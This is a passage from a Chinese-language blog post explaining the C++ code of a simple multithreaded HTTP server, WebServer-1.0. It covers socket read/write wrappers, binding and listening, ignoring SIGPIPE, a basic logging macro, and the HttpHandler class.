class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">ssize_t</span> tmpRead = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// 尝试循环读取,如果报错,则进行判断</span></span><br><span class="line">        <span class="comment">// 注意, read 的返回值为0则表示读取到 EOF,是正常现象</span></span><br><span class="line">        <span class="keyword">if</span>(isRead)</span><br><span class="line">            tmpRead = <span class="built_in">read</span>(fd, pos, leftNum);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            tmpRead = <span class="built_in">recv</span>(fd, pos, leftNum, (isBlock ? <span class="number">0</span> : MSG_DONTWAIT));</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span>(tmpRead &lt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(errno == EINTR)</span><br><span class="line">                tmpRead = <span class="number">0</span>;</span><br><span class="line">            <span class="comment">// 如果始终读取不到数据,则提前返回,因为这个取决于远程 fd,无法预测要等多久</span></span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> (errno == EAGAIN)</span><br><span class="line">                <span class="keyword">return</span> readNum;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 读取的0,则说明远程连接已被关闭</span></span><br><span class="line">        <span class="keyword">if</span>(tmpRead == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        readNum += tmpRead;</span><br><span class="line">        pos += tmpRead;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 如果是阻塞模式下,并且读取到的数据较小,则说明数据已经全部读取完成,直接返回</span></span><br><span class="line">        <span class="keyword">if</span>(isBlock &amp;&amp; <span class="built_in">static_cast</span>&lt;<span class="type">size_t</span>&gt;(tmpRead) &lt; leftNum)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">        leftNum -= tmpRead;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> readNum;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>write/send 函数的 wrapper 同理：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ssize_t</span> <span class="title">writen</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span>*buf, <span class="type">size_t</span> len, <span class="type">bool</span> isWrite)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 这里将 void* 转换成 char* 是为了在下面进行自增操作</span></span><br><span class="line">    <span class="type">char</span> *pos = (<span class="type">char</span>*)buf;</span><br><span class="line">    <span class="type">size_t</span> leftNum = len;</span><br><span class="line">    <span class="type">ssize_t</span> writtenNum = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span>(leftNum &gt; <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">ssize_t</span> tmpWrite = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(isWrite)</span><br><span class="line">            tmpWrite = <span class="built_in">write</span>(fd, pos, leftNum);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            tmpWrite = <span class="built_in">send</span>(fd, pos, leftNum, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 尝试循环写入,如果报错,则进行判断</span></span><br><span class="line">        <span class="keyword">if</span>(tmpWrite &lt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 与read不同的是,如果 EAGAIN,则继续重复写入,因为写入操作是有Server这边决定的</span></span><br><span class="line">            <span class="keyword">if</span>(errno == EINTR || errno == EAGAIN)</span><br><span class="line">                tmpWrite = <span class="number">0</span>;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(tmpWrite == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        writtenNum += tmpWrite;</span><br><span class="line">        pos += tmpWrite;</span><br><span class="line">        leftNum -= tmpWrite;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> writtenNum;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="7-建立连接">7. 建立连接</h3><p>综上各类函数的分析，现在我们可以为服务器端开启一个<strong>监听套接字</strong>，并等待客户端连接：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">socket_bind_and_listen</span><span class="params">(<span class="type">int</span> port)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> listen_fd = <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// 开始创建 socket, 注意这是阻塞模式的socket</span></span><br><span class="line">    <span class="comment">// AF_INET      : IPv4 Internet protocols  </span></span><br><span class="line">    <span class="comment">// SOCK_STREAM  : TCP socket</span></span><br><span class="line">    <span class="keyword">if</span>((listen_fd = <span class="built_in">socket</span>(AF_INET, SOCK_STREAM, <span class="number">0</span>)) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 绑定端口</span></span><br><span class="line">    sockaddr_in server_addr;</span><br><span class="line">    <span class="comment">// 初始化一下</span></span><br><span class="line">    <span class="built_in">memset</span>(&amp;server_addr, <span class="string">&#x27;\0&#x27;</span>, <span class="built_in">sizeof</span>(server_addr));</span><br><span class="line">    <span class="comment">// 设置一下基本操作</span></span><br><span class="line">    server_addr.sin_family = AF_INET;</span><br><span class="line">    server_addr.sin_port = <span class="built_in">htons</span>((<span class="type">unsigned</span> <span class="type">short</span>)port);</span><br><span class="line">    server_addr.sin_addr.s_addr = <span class="built_in">htonl</span>(INADDR_ANY);</span><br><span class="line">    <span class="comment">// 端口复用</span></span><br><span class="line">    <span class="type">int</span> opt = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">setsockopt</span>(listen_fd, SOL_SOCKET, SO_REUSEADDR, &amp;opt, <span class="built_in">sizeof</span>(opt)) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    <span class="comment">// 试着bind</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">bind</span>(listen_fd, (sockaddr*)&amp;server_addr, <span class="built_in">sizeof</span>(server_addr)) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    <span class="comment">// 试着listen, 设置最大队列长度为 1024</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">listen</span>(listen_fd, <span class="number">1024</span>) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> listen_fd;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>注意到这部分代码，设置<strong>端口复用</strong>属性：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 端口复用</span></span><br><span class="line"><span class="type">int</span> opt = <span class="number">1</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">setsockopt</span>(listen_fd, SOL_SOCKET, SO_REUSEADDR, &amp;opt, <span class="built_in">sizeof</span>(opt)) == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br></pre></td></tr></table></figure><p>正常来说，对于某个网络程序，一个端口只能绑定一个套接字，别的套接字无法使用这个端口。而如果需要让同一程序的不同套接字绑定统一端口，则需要设置<strong>端口复用</strong>属性。</p><blockquote><p>不过在当前WebServer-1.0版本中，设置端口复用貌似是不必要的，就算删除也无伤大雅。</p></blockquote><h3 id="8-忽略-SIGPIPE-信号">8. 忽略 SIGPIPE 信号</h3><p><strong>SIGPIPE 信号</strong>将在远程连接被中断时发出。默认的处理例程是<strong>终止程序</strong>，而这很明显不是我们所期望的处理方式。因此我们必须设置 WebServer 忽视 SIGPIPE 信号，以免被意外终止。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">handleSigpipe</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sigaction</span> sa;</span><br><span class="line">    <span class="built_in">memset</span>(&amp;sa, <span class="string">&#x27;\0&#x27;</span>, <span class="built_in">sizeof</span>(sa));</span><br><span class="line">    sa.sa_handler = SIG_IGN;</span><br><span class="line">    sa.sa_flags = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">sigaction</span>(SIGPIPE, &amp;sa, <span class="literal">NULL</span>) == <span class="number">-1</span>)</span><br><span class="line">        <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Ignore SIGPIPE failed! &quot;</span> &lt;&lt; <span class="built_in">strerror</span>(errno) &lt;&lt; std::endl;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="四、日志输出">四、日志输出</h2><p>WebServer-1.0版本中实现的输出功能较为简单，只将信息输出到终端的stdout、stderr，没有建立日志文件。</p><p>具体实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief   输出信息相关宏定义与函数</span></span><br><span class="line"><span class="comment"> *          使用 `LOG(INFO) &lt;&lt; &quot;msg&quot;;` 形式以执行信息输出.</span></span><br><span class="line"><span class="comment"> * @note    注意: 该宏功能尚未完备,多线程下使用LOG宏将会导致输出数据混杂</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> INFO    1           <span class="comment">/* 普通输出 */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> ERROR   2           <span class="comment">/* 错误输出 */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> LOG(x)  logmsg(x)   <span class="comment">/* 调用输出函数 */</span></span></span><br><span class="line"></span><br><span class="line"><span class="function">std::ostream&amp; <span class="title">logmsg</span><span class="params">(<span class="type">int</span> flag)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 输出信息时,设置线程互斥</span></span><br><span class="line">    <span class="comment">// 获取线程 TID</span></span><br><span class="line">    <span class="type">long</span> tid = <span class="built_in">syscall</span>(SYS_gettid);</span><br><span class="line">    <span class="keyword">if</span>(flag == ERROR)</span><br><span class="line">    &#123;</span><br><span class="line">        std::cerr &lt;&lt; tid &lt;&lt; <span class="string">&quot;: [ERROR]\t&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> std::cerr;       </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span>(flag == INFO)</span><br><span class="line">    &#123;</span><br><span class="line">        std::cout &lt;&lt; tid &lt;&lt; <span class="string">&quot;: [INFO]\t&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> std::cout;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">logmsg</span>(ERROR) &lt;&lt; <span class="string">&quot;错误的 LOG 选择&quot;</span> &lt;&lt; std::endl;</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果有信息需要输出到终端，则按照以下调用方式使用即可，简单方便：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;my msg&quot;</span> &lt;&lt; std::endl;</span><br></pre></td></tr></table></figure><p>输出信息时，会自动将当前子线程的 LWP 号以及信息类型（INFO/ERROR）输出，例如：</p><p><img src="/2021/05/WebServer-1/image-20210512133247864.png" alt="image-20210512133247864"></p><p>需要注意的是，该输出功能<strong>没有</strong>设置多线程互斥，因此可能会造成输出格式异常，即多个线程同时使用LOG功能，输出的数据在终端上揉成一团，显示的不太雅观。</p><h2 id="五、http-请求处理">五、http 请求处理</h2><h3 id="1-概述-3">1. 概述</h3><p>当 Server 成功与 Client 建立连接后，Client 将会发送数据至 Server，此时 Server 就需要解析数据并进一步将目标数据传送回 Client。其中，http报文的解析和http header的处理便是重点。</p><h3 id="2-连接">2. 连接</h3><p>当建立起一个新的客户端套接字(<strong>client_fd</strong>)后，目标事件将被放进事件队列中，并等待空闲线程处理。</p><p>而这里的事件便是以下函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">handlerConnect</span><span class="params">(<span class="type">void</span>* arg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span>* fd_ptr = (<span class="type">int</span>*)arg;</span><br><span class="line">    <span class="type">int</span> client_fd = *fd_ptr;</span><br><span class="line">    <span class="keyword">delete</span> fd_ptr;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(client_fd &lt; <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;client_fd error in handlerConnect&quot;</span> &lt;&lt; endl;</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function">HttpHandler <span class="title">handler</span><span class="params">(client_fd)</span></span>;</span><br><span class="line">    handler.<span class="built_in">RunEventLoop</span>();</span><br><span class="line">    <span class="built_in">close</span>(client_fd);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>我们可以很容易的看到，该函数只做了几件事情：</p><ol><li>取出 client_fd</li><li>初始化 HttpHandler 类实例</li><li>调用 <code>HttpHandler::RunEventLoop</code> 函数</li><li>最终释放 client_fd</li></ol><p>这里的 <strong>HttpHandler</strong> 类，就是下文中的重点。</p><p>HttpHandler 支持部分 HTTP/1.1 版本的特性——<strong>持续连接</strong>。默认情况下，执行其 RunEventLoop 成员函数时，将循环读取来自客户端的请求，处理并返回对应的响应报文。</p><p>HttpHandler 的整体代码结构如下所示，主要是由多个成员函数以及少数几个成员变量组成。RunEventLoop 函数是启动整个处理请求循环的一个开关函数:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief HttpHandler 类处理每一个客户端连接,并根据读入的http报文,动态返回对应的response</span></span><br><span class="line"><span class="comment"> *        其支持的 HTTP 版本为 HTTP/1.1</span></span><br><span class="line"><span class="comment"> * @note  该类只实现了部分异常处理,没有涵盖大部分的异常(不过暂时也够了)</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">HttpHandler</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     *  @brief HttpHandler内部状态 </span></span><br><span class="line"><span class="comment">     */</span> </span><br><span class="line">    <span class="keyword">enum</span> <span class="title class_">ERROR_TYPE</span> &#123;</span><br><span class="line">        ERR_SUCCESS = <span class="number">0</span>,                <span class="comment">// 无错误</span></span><br><span class="line">        ERR_READ_REQUEST_FAIL,          <span class="comment">// 读取请求数据失败</span></span><br><span class="line">        ERR_NOT_IMPLEMENTED,            <span class="comment">// 不支持一些特定的请求操作,例如 Post</span></span><br><span class="line">        ERR_HTTP_VERSION_NOT_SUPPORTED, <span class="comment">// 不支持当前客户端的http版本</span></span><br><span class="line">        ERR_INTERNAL_SERVER_ERR,        <span class="comment">// 程序内部错误</span></span><br><span class="line">        ERR_CONNECTION_CLOSED,          <span class="comment">// 远程连接已关闭</span></span><br><span class="line">        ERR_BAD_REQUEST,                <span class="comment">// 用户的请求包中存在错误,无法解析  </span></span><br><span class="line">        ERR_SEND_RESPONSE_FAIL          <span class="comment">// 响应包发送失败</span></span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief   显式指定 client fd</span></span><br><span class="line"><span class="comment">     * @param   fd 连接的 fd, 初始值为 -1</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function"><span class="keyword">explicit</span> <span class="title">HttpHandler</span><span class="params">(<span class="type">int</span> fd = <span class="number">-1</span>)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief   释放所有 HttpHandler 所使用的资源</span></span><br><span class="line"><span class="comment">     * @note    注意,不会主动关闭 client_fd</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    ~<span class="built_in">HttpHandler</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief   为当前连接启动事件循环</span></span><br><span class="line"><span class="comment">     * @note    1. 在执行事件循环开始之前,一定要设置 client fd</span></span><br><span class="line"><span class="comment">     *          2. 异常处理不完备</span></span><br><span class="line"><span class="comment">     */</span> </span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">RunEventLoop</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 只有getFd,没有setFd,因为Fd必须在创造该实例时被设置</span></span><br><span class="line">    <span class="function"><span class="type">int</span> <span class="title">getClientFd</span><span class="params">()</span>           </span>&#123; <span class="keyword">return</span> client_fd_; &#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="type">const</span> <span class="type">size_t</span> MAXBUF = <span class="number">1024</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> client_fd_;</span><br><span class="line">    <span class="comment">// http 请求包的所有数据</span></span><br><span class="line">    string request_;</span><br><span class="line">    <span class="comment">// http 头部</span></span><br><span class="line">    unordered_map&lt;string, string&gt; headers_; </span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 请求方式</span></span><br><span class="line">    string method_;</span><br><span class="line">    <span class="comment">// 请求路径</span></span><br><span class="line">    string path_;</span><br><span class="line">    <span class="comment">// http版本号</span></span><br><span class="line">    string http_version_;</span><br><span class="line">    <span class="comment">// 是否是 `持续连接`</span></span><br><span class="line">    <span class="comment">// <span class="doctag">NOTE:</span> 为了防止bug的产生,对于每一个类中的isKeepAlive_来说,</span></span><br><span class="line">    <span class="comment">//       值只能从 true -&gt; false,而不能再次从 false -&gt; true</span></span><br><span class="line">    <span class="type">bool</span> isKeepAlive_;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 当前解析读入数据的位置</span></span><br><span class="line">    <span class="comment">/** </span></span><br><span class="line"><span class="comment">     * <span class="doctag">NOTE:</span> 该成员变量只在 </span></span><br><span class="line"><span class="comment">     *      readRequest -&gt; parseURI -&gt; parseHttpHeader -&gt; RunEventLoop </span></span><br><span class="line"><span class="comment">     * 内部中使用</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="type">size_t</span> pos_;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 将当前client_fd_对应的连接信息,以 LOG(INFO) 的形式输出</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">printConnectionStatus</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 从client_fd_中读取数据至 request_中</span></span><br><span class="line"><span class="comment">     * @return 0 表示读取成功, 其他则表示读取过程存在错误</span></span><br><span class="line"><span class="comment">     * @note 内部函数recvn在错误时会产生 errno</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">readRequest</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 从0位置处解析 请求方式\URI\HTTP版本等</span></span><br><span class="line"><span class="comment">     * @return 0 表示成功解析, 其他则表示解析过程存在错误</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">parseURI</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 从request_中的pos位置开始解析 http header</span></span><br><span class="line"><span class="comment">     * @return 0 表示成功解析, 其他则表示解析过程存在错误</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">parseHttpHeader</span><span class="params">()</span></span>;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief   发送响应报文给客户端</span></span><br><span class="line"><span class="comment">     * @param   responseCode        http 状态码, http报文第二个字段</span></span><br><span class="line"><span class="comment">     * @param   responseMsg         http 报文第三个字段</span></span><br><span class="line"><span class="comment">     * @param   responseBodyType    返回的body类型,即 Content-type</span></span><br><span class="line"><span class="comment">     * @param   responseBody        返回的body内容</span></span><br><span class="line"><span class="comment">     * @return 0 表示成功发送, 其他则表示发送过程存在错误</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">sendResponse</span><span class="params">(<span class="type">const</span> string&amp; responseCode, <span class="type">const</span> string&amp; responseMsg, </span></span></span><br><span class="line"><span class="params"><span class="function">                      <span class="type">const</span> string&amp; responseBodyType, <span class="type">const</span> string&amp; responseBody)</span></span>;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 发送错误信息至客户端</span></span><br><span class="line"><span class="comment">     * @param errCode   错误http状态码</span></span><br><span class="line"><span class="comment">     * @param errMsg    错误信息, http报文第三个字段</span></span><br><span class="line"><span class="comment">     * @return 0 表示成功发送, 其他则表示发送过程存在错误</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">ERROR_TYPE <span class="title">handleError</span><span class="params">(<span class="type">const</span> string&amp; errCode, <span class="type">const</span> string&amp; errMsg)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 将传入的字符串转义成终端可以直接显示的输出</span></span><br><span class="line"><span class="comment">     * @param str 待输出的字符串</span></span><br><span class="line"><span class="comment">     * @return 转义后的字符串</span></span><br><span class="line"><span class="comment">     * @note  是将 &#x27;\r&#x27; 等无法在终端上显示的字符,转义成 &quot;\r&quot;字符串 输出</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function">string <span class="title">escapeStr</span> <span class="params">(<span class="type">const</span> string&amp; str)</span></span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h3 id="3-错误类型">3. 错误类型</h3><p>HttpHandler 中实现了以下错误类型：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">*  @brief HttpHandler内部状态 </span></span><br><span class="line"><span class="comment">*/</span> </span><br><span class="line"><span class="keyword">enum</span> <span class="title class_">ERROR_TYPE</span> &#123;</span><br><span class="line">    ERR_SUCCESS = <span class="number">0</span>,                <span class="comment">// 无错误</span></span><br><span class="line">    ERR_READ_REQUEST_FAIL,          <span class="comment">// 读取请求数据失败</span></span><br><span class="line">    ERR_NOT_IMPLEMENTED,            <span class="comment">// 不支持一些特定的请求操作,例如 Post</span></span><br><span class="line">    ERR_HTTP_VERSION_NOT_SUPPORTED, <span class="comment">// 不支持当前客户端的http版本</span></span><br><span class="line">    ERR_INTERNAL_SERVER_ERR,        <span class="comment">// 程序内部错误</span></span><br><span class="line">    